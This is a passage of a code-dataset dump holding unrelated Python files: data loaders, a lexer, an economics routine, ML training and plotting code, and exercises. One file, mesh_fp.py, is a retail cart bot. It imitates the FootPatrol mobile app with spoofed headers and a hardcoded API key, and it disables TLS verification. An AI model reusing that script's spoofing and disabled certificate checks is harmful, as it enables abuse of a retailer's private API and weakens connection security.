2015-2016 Chris Kauffman\n\nimport argparse\nimport csv\nimport sqlite3\nimport logging\nimport logging.config\nfrom apiReportToolsCommon import cleanStr\nfrom apiReportToolsCommon import cleanStrLower\n\nlogging.config.fileConfig('apiReportToolsLogging.conf')\nlogger = logging.getLogger('loadSFAccountTeam')\n\nparser = argparse.ArgumentParser(description='Send some emails through AWS.')\n\nparser.add_argument('-i', '--input', dest ='inputFile', help='csv input file', required=True)\nparser.add_argument('-d', '--dbfile', dest ='database', help='database file', default=':memory:')\nparser.add_argument('-u', '--update', dest ='update', action='store_true', help='Update fields when values differ')\n\nargs = parser.parse_args()\n\nlogger.info('Processing: ' + args.inputFile)\nlogger.info('Database: ' + args.database)\n\n# Open the input csv file\ntry:\n inputFileHandle = open(args.inputFile, 'r')\nexcept:\n print(\"Input file \" + args.inputFile + \" error.\")\n logger.error(\"Input file \" + args.inputFile + \" error.\")\n quit()\ninputDictReader = csv.DictReader(inputFileHandle, delimiter=',')\n\n# Setup the database connection\ndbConnection = sqlite3.connect(args.database)\ndbReadCursor = dbConnection.cursor()\ndbUpdateCursor = dbConnection.cursor()\n\ntotalCount = 0\nuniqueKeyCount = 0\nupdateKeyCount = 0\nbadRecordCount = 0\n\nbadAccountID = ('Account Team',\n 'Copyright (c) 2000-2015 salesforce.com, inc. All rights reserved.',\n 'Confidential Information - Do Not Distribute',\n 'Bazaarvoice, Inc.')\n\nfor inputAccountTeamRecord in inputDictReader:\n totalCount += 1\n\n #Validate input record \n if inputAccountTeamRecord['Account ID'] is not None and len(inputAccountTeamRecord['Account ID']) > 0 and inputAccountTeamRecord['Account ID'] not in badAccountID and \"Generated\" not in inputAccountTeamRecord['Account ID']:\n # Check to see if we have seen this record\n SQL = '''SELECT ID,\n SF_ID_18,\n CSD,\n TSM,\n TAM\n FROM Accounts\n WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Account ID']), )\n dbReadCursor.execute(SQL, SQLdata)\n dbAccountRecord = dbReadCursor.fetchone()\n if dbAccountRecord is None:\n #Record does not exist. Adding a new record.\n uniqueKeyCount += 1\n logger.warning('Account ' + cleanStr(inputAccountTeamRecord['Account ID']) + ' does not exist.')\n else:\n #Record exists. Will update if flag is set.\n updateKeyCount += 1\n if args.update:\n logger.debug('Updating: ' + cleanStr(inputAccountTeamRecord['Account ID']))\n if inputAccountTeamRecord['Team Role'] == 'Client Partner':\n if dbAccountRecord[2] is not None:\n logger.info('Updating existing TAM value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[2]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET CP = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n elif inputAccountTeamRecord['Team Role'] == 'Client Success Director':\n if dbAccountRecord[3] is not None:\n logger.info('Updating existing TSM value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[3]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET CSD = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n elif inputAccountTeamRecord['Team Role'] == 'Primary TSM':\n if dbAccountRecord[3] is not None:\n logger.info('Updating existing TSM value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[3]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET TSM = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n elif inputAccountTeamRecord['Team Role'] == 'Technical Account Manager':\n if dbAccountRecord[4] is not None:\n logger.info('Updating existing TAM value with new value. ID=' + dbAccountRecord[0] +\n ', dbValue=' + cleanStr(dbAccountRecord[4]) +\n ', newValue=' + cleanStr(inputAccountTeamRecord['Name']))\n SQL = '''UPDATE Accounts SET TAM = ? WHERE ID = ?;'''\n SQLdata = (cleanStr(inputAccountTeamRecord['Name']), cleanStr(inputAccountTeamRecord['Account ID']), )\n try:\n dbUpdateCursor.execute(SQL, SQLdata)\n except sqlite3.Error as errorMessage:\n logger.error('SQL error on update Accounts: ' + str(errorMessage) + ' on record: ' + str(inputAccountTeamRecord))\n else:\n logger.warning('Account ' + cleanStr(inputAccountTeamRecord['Account ID']) + ' Unknown Team Role: ' + cleanStr(inputAccountTeamRecord['Team Role']))\n else:\n logger.debug('Skipping - No Update Flag: ' + cleanStr(inputAccountTeamRecord['Account ID']))\n else:\n logger.debug('Skipping - Bad Record: ' + cleanStr(inputAccountTeamRecord['Account ID'])) \n badRecordCount += 1\n\ninputFileHandle.close()\ndbConnection.commit()\ndbConnection.close()\n \nlogger.info('Total Records: ' + str(totalCount))\nlogger.info('Bad Records: ' + str(badRecordCount))\nlogger.info('Added Records: ' + str(uniqueKeyCount))\nlogger.info('Existing Records: ' + str(updateKeyCount))\n\nquit()\n","sub_path":"loadSFAccountTeam.py","file_name":"loadSFAccountTeam.py","file_ext":"py","file_size_in_byte":7232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513316138","text":"from collections import Counter\n\n\nclass Solution:\n def partitionLabels(self, S):\n c = Counter(S)\n r = []\n p = set()\n l = -1\n for i in range(len(S)):\n p.add(S[i])\n c[S[i]] -= 1\n ok = True\n for ch in p:\n if c[ch] != 0:\n ok = False\n break\n if ok:\n r.append(i - l)\n l = i\n p = set()\n return r\n\n\nif __name__ == '__main__':\n print(Solution().partitionLabels('ababcbacadefegdehijhklij'))\n","sub_path":"src/leetcode/P3448.py","file_name":"P3448.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"626369101","text":"\"\"\"\nOrigin: QEwP by John Stachurski and Thomas J. Sargent\nDate: 3/2013\nFile: tauchen.py\n\nDiscretizes Gaussian linear AR(1) processes via Tauchen's method\n\n\"\"\"\n\nimport numpy as np\nfrom scipy.stats import norm\n\ndef approx_markov(rho, sigma, m=3, N=7):\n \"\"\"\n Computes the Markov matrix associated with a discretized version of\n the linear Gaussian AR(1) process \n\n y_{t+1} = rho * y_t + u_{t+1}\n\n according to Tauchen's method. Here {u_t} is an iid Gaussian process with\n zero mean.\n\n Parameters\n\n * rho is the correlation coefficient\n * sigma is the standard deviation of u\n * m parameterizes the width of the state space\n * N is the number of states\n\n \"\"\"\n F = norm(loc=0, scale=sigma).cdf\n std_y = np.sqrt(sigma**2 / (1-rho**2)) # standard deviation of y_t\n ymax = m * std_y # top of discrete state space\n ymin = - ymax # bottom of discrete state space\n S = np.linspace(ymin, ymax, N) # discretized state space\n step = (ymax - ymin) / (N - 1)\n half_step = 0.5 * step\n P = np.empty((N, N))\n\n for j in range(N):\n P[j, 0] = F(S[0]-rho * S[j] + half_step)\n P[j, N-1] = 1 - F(S[N-1] - rho * S[j] - half_step)\n for k in range(1, N-1):\n z = S[k] - rho * S[j]\n P[j, k] = F(z + half_step) - F(z - half_step)\n\n return S, P\n","sub_path":"tauchen.py","file_name":"tauchen.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150494181","text":"# SPDX-License-Identifier: Apache-2.0\n# Copyright (C) nexB Inc. and others\n# Copyright (C) 2001-2020 NLTK Project\n# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.\n# See https://github.com/nexB/pygmars for support or download.\n# See https://aboutcode.org for more information about nexB OSS projects.\n#\n\n\"\"\"\nUtilities for lexical analysis of text e.g. split a text in a list of tokens and\nrecognize each token type or meaning.\n\nSee https://en.wikipedia.org/wiki/Lexical_analysis\n\nTokens are kept in a lightweight Token class with a label. A \"token label\" is an\nuppercase string that specifies some property of a string, such as its part of\nspeech or whether it is a keyword, literal or variable.\n\"\"\"\n\n# Originally based on: Natural Language Toolkit\n# substantially modified for use in ScanCode-toolkit\n#\n# Natural Language Toolkit (NLTK)\n# URL: \n# Author: Edward Loper \n# Steven Bird (minor additions)\n# Tiago Tresoldi (original affix tagger)\n#\n# The Natural Language Toolkit (NLTK) is an open source Python library\n# for Natural Language Processing. A free online book is available.\n# (If you use the library for academic research, please cite the book.)\n#\n# Steven Bird, Ewan Klein, and Edward Loper (2009).\n# Natural Language Processing with Python. O'Reilly Media Inc.\n# http://nltk.org/book\n\nimport re\n\nfrom pygmars import Token\n\n\nclass Lexer:\n \"\"\"\n Regular Expression Lexer\n\n The Lexer assigns a label to Tokens by comparing the Token string value to a\n series of regular expressions using re.match (or a callable with the same\n semantics). For example, the following lexer uses word suffixes to make\n guesses about the part of speech tag to use as a Token label:\n\n >>> from pygmars.lex import Lexer\n >>> words = '''The Fulton County Grand Jury said Friday an investigation\n ... of Atlanta's recent primary election produced `` no evidence '' that\n ... any irregularities took place .'''.split()\n >>> regexp_lexer = Lexer(\n ... [(r'^-?[0-9]+(.[0-9]+)?$', 'CD'), # cardinal numbers\n ... (r'(The|the|A|a|An|an)$', 'AT'), # articles\n ... (r'.*able$', 'JJ'), # adjectives\n ... (r'.*ness$', 'NN'), # nouns formed from adjectives\n ... (r'.*ly$', 'RB'), # adverbs\n ... (r'.*s$', 'NNS'), # plural nouns\n ... (r'.*ing$', 'VBG'), # gerunds\n ... (r'.*ed$', 'VBD'), # past tense verbs\n ... (r'.*', 'NN') # nouns (default)\n ... ])\n >>> regexp_lexer\n \n >>> results = regexp_lexer.lex_strings(words)\n >>> expected = [('The', 'AT'), ('Fulton', 'NN'), ('County', 'NN'),\n ... ('Grand', 'NN'), ('Jury', 'NN'), ('said', 'NN'), ('Friday', 'NN'),\n ... ('an', 'AT'), ('investigation', 'NN'), ('of', 'NN'),\n ... (\"Atlanta's\", 'NNS'), ('recent', 'NN'), ('primary', 'NN'),\n ... ('election', 'NN'), ('produced', 'VBD'), ('``', 'NN'), ('no', 'NN'),\n ... ('evidence', 'NN'), (\"''\", 'NN'), ('that', 'NN'), ('any', 'NN'),\n ... ('irregularities', 'NNS'), ('took', 'NN'), ('place', 'NN'), ('.', 'NN')]\n >>> results = [(t.value, t.label) for t in results]\n >>> assert results == expected\n \"\"\"\n\n def __init__(self, matchers, re_flags=0):\n \"\"\"\n Initialize a Lexer from a ``matchers`` list of ``(matcher, label)``\n tuples that indicates that a Token with a value matching ``matcher``\n should be assigned a label of ``label``. The matchers are evaluated in\n sequence and the first match is returned. A ``matcher`` is either:\n\n - a regex string that will be compile and used with re.match\n - a callable that takes a single string as argument and returns True\n if the string is matched, False otherwise.\n\n \"\"\"\n try:\n self._matchers = [\n (\n re.compile(m, flags=re_flags).match\n if isinstance(m, str) else m,\n label,\n )\n for m, label in matchers\n ]\n except Exception as e:\n raise Exception(\n f'Invalid Lexer matcher: {m!r}, label: {label}') from e\n\n def tokenize(self, string, splitter=str.split):\n \"\"\"\n Return an iterable of pygmars.Tokens given a ``string`` split with the\n ``splitter`` function.\n \"\"\"\n for ln, line in enumerate(string.splitlines(False), 1):\n for pos, value in enumerate(splitter(line)):\n yield Token(value, pos=pos, start_line=ln)\n\n def lex_string(self, string, trace=False):\n \"\"\"\n Return an iterable of pygmars.Tokens given a ``string``. Assign a\n \"label\" to every token whose value is matched by one of rules of this\n lexer.\n \"\"\"\n return self.lex_tokens(self.tokenize(string), trace=trace)\n\n def lex_strings(self, strings, trace=False):\n \"\"\"\n Return an iterable of pygmars.Tokens given a ``strings`` iterable of\n strings. Assign a \"label\" to every token whose value is matched by one\n of rules of this lexer.\n \"\"\"\n tokens = (Token(val, pos=pos) for pos, val in enumerate(strings))\n return self.lex_tokens(tokens, trace=trace)\n\n def lex_tokens(self, tokens, trace=False):\n \"\"\"\n Return an iterable of pygmars.Token given a ``tokens`` Token iterable.\n Assign a \"label\" to every token whose value is matched by one of regexp\n rules of this lexer.\n \"\"\"\n matchers = self._matchers\n for tidx, token in enumerate(tokens):\n for midx, (matcher, label) in enumerate(matchers):\n if matcher(token.value):\n if trace:\n _trace_lex(tidx, token, midx, matcher, label)\n\n token.label = label\n break\n yield token\n\n def __repr__(self):\n return f\"\"\n\n\ndef _trace_lex(tidx, token, midx, matcher, label):\n mtchd = matcher(token.value)\n try:\n # a regex\n mtchr = matcher.__self__.pattern\n except AttributeError:\n # anything else\n mtchr = repr(matcher)\n print(f'lex_tokens: matcher #{midx} label: {label} pattern: {mtchr}')\n print(f' matched token #{tidx}: {token.value} matched: {mtchd}')\n","sub_path":"src/pygmars/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603714343","text":"#!/usr/bin/env python\nimport _init_paths\nimport os.path as osp\nfrom load_prob_stats_and_calc_hist_thresh import load_prob_stats_and_calc_hist_thresh\n\nif __name__ == '__main__':\n stats_fn_list = [\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\stats-max-label-info-webface-webface-corr.txt',\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\stats-max-label-info-asian-webface-corr.txt',\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\corr_prob-stats-max-label-info-vggface-webface.txt',\n r'C:\\zyf\\dnn_models\\face_models\\face-datasets-merge\\corr_prob-stats-max-label-info-vggface2-webface.txt'\n ]\n num_ids_list = [10572, 10245, 2564, 8631]\n num_images_list = None\n\n\n# # only_after_bin_val = False\n# only_after_bin_val = 0.55\n# # only_after_bin_val = 0.5\n only_after_bin_val_list = [0, 0.55, 0.5]\n\n show_hist = False\n\n num_fns = len(stats_fn_list)\n\n save_root_dir = './rlt_hist_probs_stats/corr_webface'\n\n for bin_val in only_after_bin_val_list:\n save_dir = osp.join(save_root_dir, 'hist_png')\n if bin_val > 0:\n save_dir += '_thr_%g' % bin_val\n\n for i, stats_fn in enumerate(stats_fn_list):\n for j in range(i + 1, num_fns):\n num_images1 = -1\n num_images2 = -1\n if num_ids_list:\n num_images1 = num_ids_list[i]\n num_images2 = num_ids_list[i]\n load_prob_stats_and_calc_hist_thresh(stats_fn_list[i], num_ids_list[i], None, num_images1,\n stats_fn_list[j], num_ids_list[j], None, num_images2,\n bin_val, show_hist, save_dir)\n","sub_path":"scripts/test_and_plot_probs_hists/test_hist_probs_stats/test_hist_thresh_corr_on_webface.py","file_name":"test_hist_thresh_corr_on_webface.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"105780248","text":"import requests, json, ssl, re\n\nrequests.packages.urllib3.disable_warnings()\n\nclass footpatrol(object):\n def __init__(self):\n self.s = requests.Session()\n self.cart_id = 'CART ID HERE'\n\n def add(self,sku):\n print ('adding %s'%sku)\n self.headers = {\n 'Host': 'commerce.mesh.mx',\n 'Content-Type': 'application/json',\n 'X-API-Key': '5F9D749B65CD44479C1BA2AA21991925',\n 'Accept': '*/*',\n 'X-Debug': '1',\n 'Accept-Language': 'en-us',\n 'User-Agent': 'FootPatrol/2.0 CFNetwork/811.5.4 Darwin/16.6.0',\n 'MESH-Commerce-Channel': 'iphone-app',\n }\n\n data = '{\"quantity\":1}'\n\n add = self.s.put('https://commerce.mesh.mx/stores/footpatrol/carts/%s/%s'%(self.cart_id,sku),verify=False, headers=self.headers, data=data)\n if 200 <= add.status_code < 400:\n print ('Added to your Iphone cart %s'%sku)\n return True\n else:\n print (add.text)\n\n def view_cart(self,cart_id):\n page = self.s.get('https://commerce.mesh.mx/stores/footpatrol/carts/%s'%self.cart_id, headers=self.headers)\n jsontxt = json.loads(page.text)\n print ('Items in your Cart\\n\\n')\n for info in jsontxt[u'products']:\n sku = info[u'SKU']\n name = info[u'name']\n qty = info[u'totalQuantity']\n message = 'SKU: %s\\nItem Name: %s\\nTotal Products: %s\\n'%(sku,name,qty)\n print (message)\n\ndef main():\n fp = footpatrol()\n fp.add(input(\"PLEASE ENTER PID \"))\n fp.view_cart(fp.cart_id)\n\nif __name__ == '__main__':\n main()\n","sub_path":"mesh_fp.py","file_name":"mesh_fp.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413491781","text":"import requests\nimport sys\nimport time\nimport os\nfrom requests.auth import HTTPBasicAuth\n\nGRAPHDB_ADMIN_USER = os.environ['GRAPH_DB_ADMIN_USERNAME']\nGRAPHDB_ADMIN_PASSWORD = os.environ['GRAPH_DB_ADMIN_PASSWORD']\n\ndef check_triple_store_status(graphdb_url):\n url = graphdb_url + \"/rest/repositories\"\n try:\n response = requests.request(\"GET\", url)\n print(response.headers)\n if response.status_code == 200:\n return True\n except:\n return False\n\ndef load_file(graphdb_url, repo_id, file_path, content_type):\n\n url = graphdb_url + \"/repositories/\" + repo_id + \"/statements\"\n data = open(file_path, 'rb').read()\n\n headers = {\n 'content-type': content_type\n }\n\n response = requests.request(\"PUT\", url, headers=headers, data=data,\n auth=HTTPBasicAuth(GRAPHDB_ADMIN_USER,GRAPHDB_ADMIN_PASSWORD))\n print(response.headers)\n if response.status_code == 204:\n print(\"Content have be located\")\n os.remove(file_path)\n else:\n print(\"Error loading content\")\n\ndef main(graphdb_url, repo_id, file_path, content_type):\n '''\n Upload file to graphDB\n '''\n\n while True:\n if os.path.exists(file_path):\n load_file(graphdb_url, repo_id, file_path, content_type)\n else:\n print(\"Waiting for triple file to be generated. Loader sleeps for 10 seconds\")\n time.sleep(5)\n\n\nprint(\"Triple loader script started\")\ngraphdb_url = os.environ['GRAPH_DB_URL']\nrepo_id = os.environ['REPO_ID']\nfile_path = os.environ['FILE_PATH']\ncontent_type = os.environ['CONTENT_TYPE']\nif graphdb_url.endswith(\"/\"):\n graphdb_url = graphdb_url[:-1]\nprint(graphdb_url)\nmain(graphdb_url, repo_id, file_path, content_type)\n","sub_path":"cde-ready-to-go/triple-loader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572493264","text":"from django.conf.urls import patterns, include, url\nimport views\n\nurlpatterns = patterns('',\n url(r'^articulo/(?P\\d+)/$',\n 'g5web.views.articulo', name='articulo'),\n\n url(r'^echar-al-carrito/articulo/(?P\\d)'\n r'/cantidad/(?P\\d)/$',\n 'g5web.views.echar_al_carrito', name='echar-al-carrito'),\n\n url(r'^catalogo-de-articulos/', 'g5web.views.catalogo_de_articulos'),\n\n url(r'^busqueda/$', 'g5web.views.busqueda', name='busqueda'),\n\n url(r'^contact/$', views.contact, name='contact'),\n\n url(r'^importar-de-g5', views.importar_de_g5, name='importar_de_g5'),\n\n url(r'^importar-de-g5', views.importar_de_g5, name='importar_de_g5'),\n\n url(r'^$', 'g5web.views.index'),\n \n)\n","sub_path":"g5web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379249181","text":"from xgboost import XGBClassifier\nfrom sklearn.metrics import make_scorer, accuracy_score, precision_score, recall_score, f1_score\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport xgboost as xgb\nfrom xgboost.compat import XGBLabelEncoder\nimport pickle\n\n\ndef train_xgb_clf(x_train, y_train, x_test, y_test):\n print(\"Start training...\")\n\n classes = np.unique(y_train)\n n_classes = len(classes)\n\n le = XGBLabelEncoder().fit(y_train)\n training_labels = le.transform(y_train)\n\n param = {\n 'max_depth': 3,\n 'subsample': 0.8,\n 'colsample_bytree': 0.8,\n 'eta': 0.1,\n 'min_child_weight': 1,\n \"n_estimators\": 300,\n 'tree_method': 'hist',\n 'silent': 1,\n 'objective': \"multi:softprob\",\n 'num_class': n_classes,\n 'nthread': 4\n }\n num_round = 300\n\n dtrain = xgb.DMatrix(x_train, label=training_labels)\n tic = time.time()\n model = xgb.train(param, dtrain, num_round)\n print('passed time with xgb (hist, cpu): %.3fs' % (time.time() - tic))\n\n classes = set(y_test)\n dtest = xgb.DMatrix(x_test)\n # print(model.get_fscore())\n # print(model.get_score())\n predictions = model.predict(dtest)\n print(predictions)\n column_indexes = np.argmax(predictions, axis=1)\n predictions = le.inverse_transform(column_indexes)\n for i, prediction in enumerate(predictions):\n best = -100\n prediction = round(prediction)\n for answer in classes:\n if abs(answer - prediction) < abs(best - prediction):\n best = answer\n predictions[i] = best\n print(predictions)\n # print(y_test)\n print(accuracy_score(y_test, predictions))\n\n return accuracy_score(y_test, predictions)\n\n\ndef train_sklearn_xgb_classifier(x_train, y_train, x_test, y_test, target, path_to_classifier=None):\n print(\"Start training...\")\n\n params = {\n \"n_estimators\": 15,\n 'tree_method': 'hist',\n 'max_depth': 3,\n 'learning_rate': 0.2,\n 'n_jobs': 4\n }\n\n indexes_train = []\n indexes_test = []\n\n for index, row in y_train.iterrows():\n if row[target] == 0:\n indexes_train.append(index)\n if row[target] == 1 and len(indexes_train) < 400:\n indexes_train.append(index)\n\n for index, row in y_test.iterrows():\n if row[target] == 0:\n indexes_test.append(index)\n if row[target] == 1 and len(indexes_test) < 400:\n indexes_test.append(index)\n\n y_train[target] = y_train[target].subtract(1).multiply(-1)\n y_test[target] = y_test[target].subtract(1).multiply(-1)\n\n x_train = x_train.ix[indexes_train]\n y_train = y_train.ix[indexes_train]\n x_test = x_test.ix[indexes_test]\n y_test = y_test.ix[indexes_test]\n\n model = XGBClassifier(**params)\n tic = time.time()\n model.fit(x_train, y_train[target])\n print('passed time with XGBClassifier (hist, cpu): %.3fs' % (time.time() - tic))\n\n if path_to_classifier:\n pickle.dump(model, open(path_to_classifier, \"wb\"))\n\n feature_importances = sorted(zip(x_train.columns.values, model.feature_importances_), key=lambda x: x[1])\n print(list(map(lambda p: p[0], feature_importances[-10:])))\n\n # classes = model.classes_\n predictions = model.predict(x_train)\n acc = accuracy_score(y_train[target], predictions)\n print(acc)\n\n predictions = model.predict(x_test)\n acc = accuracy_score(y_test[target], predictions)\n prec = precision_score(y_test[target], predictions)\n rec = recall_score(y_test[target], predictions)\n f1 = f1_score(y_test[target], predictions)\n print(\"Accuracy = {}, precision = {}, recall = {}, f1 = {}\".format(acc, prec, rec, f1))\n print(predictions)\n return acc","sub_path":"mix/predict_misses.py","file_name":"predict_misses.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99259418","text":"__author__ = 'Kalyan'\n\nmax_marks = 25\n\nnotes = '''\nA magic number is a number which results in 1 when the following process is done.\n\n1. replace number with sum of squares of each digit (the result should be converted to same base)\n2. repeat till you get a single digit\n\nIf result is 1, then it is a magic number, else it is not.\n\ne.g. 28 is a magic number in base 10.\n28 -> 68 ( 4 + 64) -> 100 (36 + 64) -> 1\n\n12 is not a magic number in base 10\n12 -> 5 ( 1 + 4)\n\n12 is not a magic number is base 5\n22 (12 in base 10 is 22 in base 5)\n-> 13 (4 + 4 = 8 in base 5 is 13)\n-> 20 (1 + 9 = 10 in base 5 is 20) ->\n-> 4 (single digit and it is not 1, so not a magic number).\n\n18 is a magic number in base 8\n\n22 (18 in base 10 is 22 in base 8)\n-> 10 ( 4+ 4 = 8 which is 10 in base 8)\n-> 1 (single digit and it is 1, so it is a magic number)\n\nYour job for this question is to write a couple of routines to find the first K magic numbers in base 8 in ascending order.\n\nNotes:\n1. k < 0 should raise ValueError.\n2. Fill up the two routines below to get the job done. The 2nd method should call the first in a loop till\n it gets the 1st k magic numbers.\n3. Use python builtins and data structures to solve this problem.\n4. Use the debugger or pytutor or add prints if you get stuck :).\n5. Note that both routines will be tested independently, so do not rename the methods or write all the logic in \n get_oct_magic_numbers method.\n'''\n\n# Given a number, returns True if it is a magic number is base 8, else False\n# raise ValueError if number < 0\ndef no(res):\n str1=oct(res)\n res1=0\n for i in str1[2:]:\n res1=res1*10+(int(i))\n return res1\n\ndef is_oct_magic(number):\n try:\n temp=number\n res=0\n if(number<0):\n raise ValueError(\"No. less than 0\")\n if (temp >= 0 and temp <= 7):\n if (temp != 1):\n return False\n else:\n return True\n while True:\n e=str(temp)\n res=0\n for i in e:\n res=res+(int(i)%10)**2\n res=no(res)\n if(res>=0 and res<=9):\n if(res!=1):\n return False\n else:\n return True\n temp=res\n except ValueError:\n pass\n\n\n\n# This method makes use of is_oct_magic and returns a list of 1st k magic numbers in base 8\ndef get_oct_magic_numbers(k):\n try:\n if(k<0):\n raise ValueError(\"less than 0\")\n res=[]\n count=0\n n=1\n while True:\n if(count==k):\n return res\n if(is_oct_magic(n)):\n res.append(n)\n count=count+1\n n=n+1\n\n except ValueError:\n pass\n\n\n# some basic tests given, write more according to given constraints. atleast check that\n# you can generate 10 magic numbers\n\ndef test_is_oct_magic():\n assert is_oct_magic(12) == False\n assert is_oct_magic(1)==True\n\ndef test_get_oct_magic_numbers():\n assert [1, 8] == get_oct_magic_numbers(2)","sub_path":"mocktest1_probem4.py","file_name":"mocktest1_probem4.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"198318132","text":"from discord.ext.commands import Bot, Cog, Context, CommandInvokeError\n\n__all__ = [\"CustomCog\"]\n\nclass CustomCog(Cog):\n async def cog_command_error(self, ctx: Context, error: Exception):\n \"\"\"\n Handles errors for custom cogs\n \"\"\"\n if isinstance(error, CommandInvokeError):\n await ctx.send(error.original)\n else:\n await ctx.send(error)","sub_path":"bot/cogs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57303825","text":"\n\nfrom xai.brain.wordbase.nouns._fluke import _FLUKE\n\n#calss header\nclass _FLUKES(_FLUKE, ):\n\tdef __init__(self,): \n\t\t_FLUKE.__init__(self)\n\t\tself.name = \"FLUKES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"fluke\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_flukes.py","file_name":"_flukes.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291908679","text":"from matplotlib import pyplot as plt\nfrom vis_utils import visualize_grid\nimport numpy as np\n\n\ndef show_traning(loss_history, train_acc_history, val_acc_history):\n plt.subplot(2, 1, 1)\n plt.plot(loss_history, 'o')\n plt.xlabel('iteration')\n plt.ylabel('loss')\n\n plt.subplot(2, 1, 2)\n plt.plot(train_acc_history, '-o')\n plt.plot(val_acc_history, '-o')\n plt.legend(['train', 'val'], loc='upper left')\n plt.xlabel('epoch')\n plt.ylabel('accuracy')\n\n plt.show()\n\n\ndef compare_trainings(loss_train_val_acc_with_labels):\n plt.subplot(3, 1, 1)\n for label in loss_train_val_acc_with_labels:\n plt.plot(loss_train_val_acc_with_labels[label][0], 'o', label=label)\n plt.title('Train loss')\n plt.xlabel('iteration')\n plt.ylabel('loss')\n plt.legend(ncol=2, loc='lower right')\n \n plt.subplot(3, 1, 2)\n for label in loss_train_val_acc_with_labels:\n plt.plot(loss_train_val_acc_with_labels[label][1], '-o', label=label)\n plt.title('Train accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend(ncol=2, loc='lower right')\n \n plt.subplot(3, 1, 3)\n for label in loss_train_val_acc_with_labels:\n plt.plot(loss_train_val_acc_with_labels[label][2], '-o', label=label)\n plt.title('Val accuracy')\n plt.xlabel('Epoch')\n plt.ylabel('Accuracy')\n plt.legend(ncol=2, loc='lower right')\n \n plt.gcf().set_size_inches(15, 15)\n plt.show()\n\n\ndef plot_mean_std_hist(parameters):\n ws = parameters\n\n ws_means = [np.mean(w) for w in ws]\n ws_stds = [np.std(w) for w in ws]\n \n for i in range(len(ws)):\n print('weight index: ', i)\n print('with size ', ws[i].shape)\n print('with mean: %f, std: %f' % (ws_means[i], ws_stds[i]))\n \n plt.figure()\n plt.subplot(121)\n plt.plot(range(len(ws_means)), ws_means, 'ob-')\n plt.title('weights means')\n plt.subplot(122)\n plt.plot(range(len(ws_stds)), ws_stds, 'or-')\n plt.title('weights stds')\n\n plt.figure()\n for i in range(len(ws)):\n plt.subplot(len(ws), 1, i+1)\n #plt.subplot(1, len(ws), i+1)\n plt.hist(ws[i].ravel(), 30)\n plt.title('weights %d hist' % i)\n \n plt.show()\n\n\ndef show_conv_weights(conv_weights):\n grid = visualize_grid(conv_weights)\n plt.imshow(grid.astype('uint8'))\n plt.axis('off')\n plt.gcf().set_size_inches(5, 5)\n plt.show()\n","sub_path":"assignment2/my2/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 